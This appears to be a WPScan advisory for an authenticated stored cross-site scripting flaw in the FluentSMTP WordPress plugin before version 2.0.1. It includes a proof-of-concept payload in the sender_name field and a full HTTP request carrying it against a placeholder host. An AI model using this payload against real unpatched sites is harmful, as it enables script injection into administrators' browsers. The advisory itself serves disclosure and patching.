WordPress Plugin Vulnerabilities
FluentSMTP < 2.0.1 - Authenticated Stored XSS
Description
The plugin does not sanitize parameters before storing the settings in the database, nor does the plugin escape the values before outputting them when viewing the SMTP settings set by this plugin, leading to a stored cross site scripting (XSS) vulnerability. Only users with roles capable of managing plugins can modify the plugin's settings.
Proof of Concept
PoC ------------------------------ connection[sender_name]=<s>here</s><img src=1 onerror=alert(/XSS/)> ------------------------------ Full Request PoC ------------------------------ POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example.com:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: */* Accept-Language: ja,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://target.example.com:8000/wp-admin/options-general.php?page=fluent-mail Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 377 Origin: http://target.example.com:8000 DNT: 1 Connection: close Cookie: [admin cookies] connection%5Bsender_name%5D=%3Cs%3Ehere%3C%2Fs%3E%3Cimg+src%3D1+onerror%3Dalert(%2FXSS%2F)%3E&connection%5Bsender_email%5D=test%40example.com&connection%5Bforce_from_name%5D=no&connection%5Bforce_from_email%5D=yes&connection%5Breturn_path%5D=yes&connection%5Bkey_store%5D=db&connection%5Bprovider%5D=default&connection_key=false&action=fluentmail-post-settings&nonce=64447f740d ------------------------------
Affects Plugins
Fixed in 2.0.1 References
CVE
YouTube Video
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
YoshiKen
Submitter
YoshiKen
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-29 (about 2 years ago)
Added
2021-07-29 (about 2 years ago)
Last Updated
2022-02-24 (about 2 years ago)
WPScan 